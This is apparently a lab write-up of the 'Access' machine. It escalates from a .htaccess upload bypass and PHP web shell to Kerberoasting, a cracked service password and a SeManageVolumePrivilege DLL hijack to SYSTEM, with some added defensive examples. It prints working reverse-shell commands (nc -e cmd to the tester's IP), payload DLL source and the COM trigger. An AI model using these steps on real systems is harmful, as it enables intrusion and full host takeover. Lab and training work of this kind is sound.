
Access

Machine Information

  • Machine Name: Access
  • Machine Difficulty: Medium

Information Gathering

Classic nmap time

Nmap scan report for 192.168.155.187
Host is up, received user-set (0.017s latency).
Scanned at 2024-10-15 19:34:48 +08 for 215s
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 125 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 125 Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34 
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
|_http-title: Access The Event
| http-methods: 
|   Supported Methods: HEAD GET POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-10-15 11:36:40Z)
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: access.offsec, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 125
464/tcp   open  kpasswd5?     syn-ack ttl 125
593/tcp   open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 125
3268/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: access.offsec, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 125
5985/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49677/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49704/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC

As usual, start with the web port first.

Port 80

I started out by exploring the website. In one of its sections there is an option to upload files.

I then tried uploading files with different extensions to see what the server would accept. Most PHP extensions were rejected, but a .htaccess upload went through, so I uploaded a malicious .htaccess file.

cat .htaccess

AddType application/x-httpd-php .txt

With that .htaccess in place, Apache treats .txt files in the upload directory as PHP, so I could upload my PHP web shell with a .txt extension. I also found the uploaded files under the /uploads/ directory. This only works because Apache honours per-directory overrides there (AddType in a .htaccess needs AllowOverride FileInfo or All); setting AllowOverride None on the upload directory, or serving uploads from a location with no script handler at all, would have stopped it.
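To make the failure concrete, here is an added example (not the target site's PHP code, which the post does not show): a reconstruction of the kind of extension blocklist that lets .htaccess and .txt through while rejecting .php, next to an allowlist check that refuses both, plus a small audit helper for .htaccess files found in an upload directory. The extension sets and the regex are my assumptions for illustration.

```python
import os
import re

# Added example, not the target site's upload handler: a blocklist of the
# kind that produced the observed behaviour (.php rejected, .htaccess and
# .txt accepted), an allowlist that does not, and a .htaccess audit helper.

BLOCKED_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}
# Any directive that hands an extension to the PHP handler inside a .htaccess.
PHP_HANDLER_RE = re.compile(r"^\s*(AddType|AddHandler|SetHandler)\s+.*php", re.I | re.M)


def blocklist_allows(filename: str) -> bool:
    """Weak check: reject a few known-bad extensions, accept everything else.
    splitext(".htaccess") yields an empty extension, so dotfiles pass too."""
    _, ext = os.path.splitext(os.path.basename(filename).lower())
    return ext not in BLOCKED_EXTENSIONS


def allowlist_allows(filename: str) -> bool:
    """Hardened check: exactly one extension from a short allowlist, no dotfiles,
    no double extensions (so .htaccess, shell.txt and shell.php.jpg are refused)."""
    base = os.path.basename(filename)
    if base.startswith(".") or base.count(".") != 1:
        return False
    _, ext = os.path.splitext(base.lower())
    return ext in ALLOWED_EXTENSIONS


def htaccess_enables_php(content: str) -> bool:
    """Audit helper: does this .htaccess text map another extension onto PHP?"""
    return PHP_HANDLER_RE.search(content) is not None


if __name__ == "__main__":
    for name in [".htaccess", "shell.txt", "shell.php", "shell.phtml", "photo.jpg"]:
        print(f"{name:12} blocklist={blocklist_allows(name)!s:5} allowlist={allowlist_allows(name)}")
    # The exact .htaccess used in the post.
    print("htaccess enables php:", htaccess_enables_php("AddType application/x-httpd-php .txt\n"))
```

The allowlist alone is not enough on its own: the server should also store uploads under a generated name and keep the directory free of script handlers (AllowOverride None plus no PHP handler for that path), so that even a file that slips through cannot be executed.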

Here’s the result before uploading .htaccess file.

Here’s the result after uploading the .htaccess file: the .txt file is now executed as PHP. With code execution, it’s time for a reverse shell. I used the nc method: upload nc.exe to the server and run it from the web shell to connect back to my listener.

rlwrap nc -nvlp 1234
listening on [any] 1234 ...
whoami
connect to [192.168.45.194] from (UNKNOWN) [192.168.155.187] 50016
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\uploads>whoami
access\svc_apache

Since this is not an administrator-level account, time for privilege escalation.

Privilege Escalation

It’s always good to start with winPEAS. After going through its output I had no idea what to do next, as nothing in it stood out. I then realised that this box is a domain controller (DNS, Kerberos, LDAP and the global catalog are all listening), which means attacks like Kerberoasting and AS-REP roasting are on the table. Since I already have a shell on it, I used Rubeus.exe to run the attacks.

C:\xampp\htdocs\uploads>.\Rubeus.exe kerberoast /nowrap
.\Rubeus.exe kerberoast /nowrap

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : access.offsec
[*] Searching path 'LDAP://SERVER.access.offsec/DC=access,DC=offsec' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName         : svc_mssql
[*] DistinguishedName      : CN=MSSQL,CN=Users,DC=access,DC=offsec
[*] ServicePrincipalName   : MSSQLSvc/DC.access.offsec
[*] PwdLastSet             : 5/21/2022 5:33:45 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec@access.offsec...

Now that I have the hash, time to crack it.

john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
trustno1         (?)     
1g 0:00:00:00 DONE (2024-10-15 22:31) 100.0g/s 102400p/s 102400c/s 102400C/s hockey..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
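The hash line Rubeus printed uses the $krb5tgs$23$ layout that john identified as "Kerberos 5 TGS etype 23". The following is an added example, not the author's tooling: it reimplements the RC4-HMAC construction from RFC 4757 that such a hash comes from, and the check a cracker performs per guess, against a ticket constructed locally with the password trustno1 (the user, realm and SPN are reused from the Rubeus output; the ticket body is a made-up byte string, and MD4 is implemented inline because OpenSSL 3 builds of hashlib often lack it).

```python
import hashlib
import hmac
import os
import struct

# Added example, not the author's tooling: minimal RC4-HMAC (etype 23) as used
# for a TGS-REP ticket, the $krb5tgs$23$ hash layout, and the guess-and-check
# loop john/hashcat run against it. The ticket is constructed locally with a
# known password; nothing here talks to a KDC.

MASK = 0xFFFFFFFF
TICKET_USAGE = struct.pack("<I", 2)  # RFC 4757 key usage 2: ticket enc-part

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rol(x, n): return ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (f, range(16), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, order, shifts, k in rounds:
            for i, j in enumerate(order):
                a = rol((a + fn(b, c, d) + x[j] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> bytes:
    """The RC4-HMAC key is the NT hash: unsalted MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()

def rc4_hmac_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """RFC 4757 encrypt: checksum(16) || RC4(K3, confounder(8) || plaintext)."""
    k1 = hmac_md5(key, TICKET_USAGE)
    data = os.urandom(8) + plaintext
    checksum = hmac_md5(k1, data)
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, data)

def make_krb5tgs_line(user, realm, spn, password, enc_ticket_part: bytes) -> str:
    """Build a hash line in the same $krb5tgs$23$ layout Rubeus printed."""
    edata = rc4_hmac_encrypt(nt_hash(password), enc_ticket_part)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"

def crack_krb5tgs(hash_line: str, candidates):
    """Offline guess-and-check: one MD4, three HMAC-MD5 and one RC4 per guess."""
    header, body = hash_line.split("*$", 1)
    if header.split("$")[2] != "23":
        raise ValueError("only RC4-HMAC (etype 23) is handled here")
    checksum, edata2 = (bytes.fromhex(p) for p in body.split("$"))
    for pw in candidates:
        k1 = hmac_md5(nt_hash(pw), TICKET_USAGE)
        k3 = hmac_md5(k1, checksum)
        if hmac_md5(k1, rc4(k3, edata2)) == checksum:  # checksum verifies => key was right
            return pw
    return None

if __name__ == "__main__":
    line = make_krb5tgs_line("svc_mssql", "access.offsec", "MSSQLSvc/DC.access.offsec",
                             "trustno1", b"constructed EncTicketPart, not a real ticket")
    print(line[:96] + "...")
    print("cracked:", crack_krb5tgs(line, ["hockey", "bethany", "trustno1"]))
```

The point this shows is why the crack finished instantly: for etype 23 the key is the unsalted NT hash, so every guess costs one MD4 and a handful of HMAC-MD5 operations. An account restricted to AES (msDS-SupportedEncryptionTypes set to AES only) derives its key with a salted PBKDF2 at 4096 iterations, which is why Rubeus warns that AES-enabled accounts return AES hashes and why a long random password on service accounts matters regardless of etype.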

A new credential was found. Time to check what access it gives me.

netexec smb 192.168.155.187 -u svc_mssql -p trustno1    
SMB         192.168.155.187 445    SERVER           [*] Windows 10 / Server 2019 Build 17763 x64 (name:SERVER) (domain:access.offsec) (signing:True) (SMBv1:False)
SMB         192.168.155.187 445    SERVER           [+] access.offsec\svc_mssql:trustno1

netexec winrm 192.168.155.187 -u svc_mssql -p trustno1 
WINRM       192.168.155.187 5985   SERVER           [*] Windows 10 / Server 2019 Build 17763 (name:SERVER) (domain:access.offsec)
WINRM       192.168.155.187 5985   SERVER           [-] access.offsec\svc_mssql:trustno1

So the credential is valid for SMB but not for WinRM: it is a real domain user, but I cannot get a shell with it directly. I thought about runas, but it has to prompt for the password on an interactive console, and my reverse shell is not one. Some searching turned up RunasCs, which takes the password on the command line and works from a non-interactive shell.

C:\xampp\htdocs\uploads>.\RunasCs.exe svc_mssql trustno1 "C:\xampp\htdocs\uploads\nc.exe 192.168.45.194 1235 -e cmd"
.\RunasCs.exe svc_mssql trustno1 "C:\xampp\htdocs\uploads\nc.exe 192.168.45.194 1235 -e cmd"
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
rlwrap nc -nvlp 1235
listening on [any] 1235 ...
connect to [192.168.45.194] from (UNKNOWN) [192.168.155.187] 61224
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
access\svc_mssql

That gave me a shell as svc_mssql, but still not an administrative one, so I ran winPEAS again. One privilege of this user stood out:

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                      State   
============================= ================================ ========
SeMachineAccountPrivilege     Add workstations to domain       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Disabled

This user has SeManageVolumePrivilege, which is searchable: a public GitHub repo (SeManageVolumeExploit) has an exploit for it that I tried and that works. It uses the privilege to rewrite file security descriptors on the C: volume, and the result is that my low-privileged user gets write access to directories it should not have, in this case C:\Windows\System32\spool\drivers\x64\3.

C:\xampp\htdocs\uploads>icacls C:\Windows\System32\spool\drivers\x64\3
icacls C:\Windows\System32\spool\drivers\x64\3
C:\Windows\System32\spool\drivers\x64\3 NT AUTHORITY\SYSTEM:(I)(F)
                                        NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                        BUILTIN\Administrators:(I)(F)
                                        BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                        Everyone:(I)(RX)
                                        Everyone:(I)(OI)(CI)(IO)(GR,GE)
                                        APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                        APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
                                        S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422:(I)(RX)
                                        S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422:(I)(OI)(CI)(IO)(GR,GE)
                                        CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

icacls shows that Everyone only has read and execute (RX) here, so my user has no write access. Now run the exploit and check the ACL again.

C:\xampp\htdocs\uploads>.\SeManageVolumeExploit.exe
.\SeManageVolumeExploit.exe
Entries changed: 920
DONE 

C:\xampp\htdocs\uploads>icacls C:\Windows\System32\spool\drivers\x64\3
icacls C:\Windows\System32\spool\drivers\x64\3
C:\Windows\System32\spool\drivers\x64\3 NT AUTHORITY\SYSTEM:(I)(F)
                                        NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                        BUILTIN\Users:(I)(F)
                                        BUILTIN\Users:(I)(OI)(CI)(IO)(F)
                                        Everyone:(I)(RX)
                                        Everyone:(I)(OI)(CI)(IO)(GR,GE)
                                        APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                        APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
                                        S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422:(I)(RX)
                                        S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422:(I)(OI)(CI)(IO)(GR,GE)
                                        CREATOR OWNER:(I)(OI)(CI)(IO)(F)
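As an added defender-side check (not code from the post or from the exploit), the script below parses the two icacls listings above and flags full-control entries held by non-privileged principals, which is exactly the change the exploit produced. The listings are copied from the post and abridged to the entries needed to show the change; the set of "privileged" principals is my assumption for illustration.

```python
import re

# Added example (not the exploit's code): parse icacls output and flag
# full-control ACEs held by non-privileged principals, the change the
# SeManageVolume exploit made to C:\Windows\System32\spool\drivers\x64\3.
# BEFORE is the post's listing, abridged; AFTER is the same listing with the
# one change the post shows (Administrators entries became Users).

BEFORE = r"""
C:\Windows\System32\spool\drivers\x64\3 NT AUTHORITY\SYSTEM:(I)(F)
                                        NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                        BUILTIN\Administrators:(I)(F)
                                        BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                        Everyone:(I)(RX)
                                        Everyone:(I)(OI)(CI)(IO)(GR,GE)
                                        CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""
AFTER = BEFORE.replace(r"BUILTIN\Administrators", r"BUILTIN\Users")

# icacls prints the path only on the first ACE line of each file.
PATH_RE = re.compile(r"^([A-Za-z]:\\\S*)\s+(.*)$")
# Assumed baseline of principals expected to hold Full control under System32.
PRIVILEGED = {r"NT AUTHORITY\SYSTEM", r"BUILTIN\Administrators",
              "CREATOR OWNER", r"NT SERVICE\TrustedInstaller"}


def parse_icacls(text: str):
    """Yield (path, principal, [ace flags]) for every ACE line in icacls output."""
    path = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        m = PATH_RE.match(line)
        if m:
            path, line = m.group(1), m.group(2)
        if path is None or ":" not in line:
            continue
        who, flags = line.rsplit(":", 1)
        yield path, who, re.findall(r"\(([^)]*)\)", flags)


def full_control_grants(text: str, privileged=PRIVILEGED):
    """Principals outside the privileged set that hold Full control (F)."""
    return sorted({who for _, who, flags in parse_icacls(text)
                   if "F" in flags and who not in privileged})


def acl_diff(before: str, after: str):
    """(added, removed) principals between two listings of the same path."""
    b = {who for _, who, _ in parse_icacls(before)}
    a = {who for _, who, _ in parse_icacls(after)}
    return a - b, b - a


if __name__ == "__main__":
    print("before:", full_control_grants(BEFORE))   # []
    print("after: ", full_control_grants(AFTER))    # ['BUILTIN\\Users']
    print("diff:  ", acl_diff(BEFORE, AFTER))
```

Running this over periodic icacls dumps of directories that privileged services load code from (the spooler driver store, System32, service binary paths) catches this class of change. Note the (I) flag on every entry: the grants are inherited from a parent, so the rewrite happened higher up the tree, which matches the 920 entries the exploit reported changing rather than a single directory.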

Alright, BUILTIN\Users now has full control of the directory, so my user can write there. Following the exploit's instructions, the next step is to replace Printconfig.dll with a DLL of my own.

#include <stdlib.h>
#include <windows.h>

// Payload DLL: when the SYSTEM-level COM server loads it in place of
// Printconfig.dll, DllMain spawns nc.exe for a reverse shell.
BOOL APIENTRY DllMain(
    HANDLE hModule,            // Handle to DLL module
    DWORD ul_reason_for_call,  // Reason for calling function
    LPVOID lpReserved)         // Reserved
{
    switch (ul_reason_for_call)
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
            system("C:\\xampp\\htdocs\\uploads\\nc.exe 192.168.45.194 1236 -e cmd");
            break;
        case DLL_THREAD_ATTACH:  // A process is creating a new thread.
        case DLL_THREAD_DETACH:  // A thread exits normally.
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
            break;
    }
    return TRUE;
}
x86_64-w64-mingw32-gcc test.cpp --shared -o test.dll

After building the DLL, I download it onto the box straight to the target path, overwriting Printconfig.dll.

C:\xampp\htdocs\uploads>curl 192.168.45.194/test.dll -o C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll
curl 192.168.45.194/test.dll -o C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 86510  100 86510    0     0  1034k      0 --:--:-- --:--:-- --:--:-- 1042k

With the file replaced, instantiate the PrintNotify COM object from PowerShell. The COM server behind that CLSID runs as SYSTEM and loads Printconfig.dll from that directory, so my DLL's DllMain runs with SYSTEM privileges.

C:\xampp\htdocs\uploads>powershell -ep bypass
powershell -ep bypass
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\xampp\htdocs\uploads> $type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
PS C:\xampp\htdocs\uploads> $object = [Activator]::CreateInstance($type)
$object = [Activator]::CreateInstance($type)
rlwrap nc -nvlp 1236
listening on [any] 1236 ...
connect to [192.168.45.194] from (UNKNOWN) [192.168.155.187] 61306
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Tada ~ that is a shell as NT AUTHORITY\SYSTEM.

Things I learned from this machine

  • upload a .htaccess to make an arbitrary file extension execute as PHP
  • perform a Kerberoasting attack using Rubeus
  • RunasCs to get a shell as another user from a non-interactive shell
  • privilege escalation using SeManageVolumePrivilege (I just followed the GitHub instructions and do not fully understand the internals yet)
This post is licensed under CC BY 4.0 by the author.
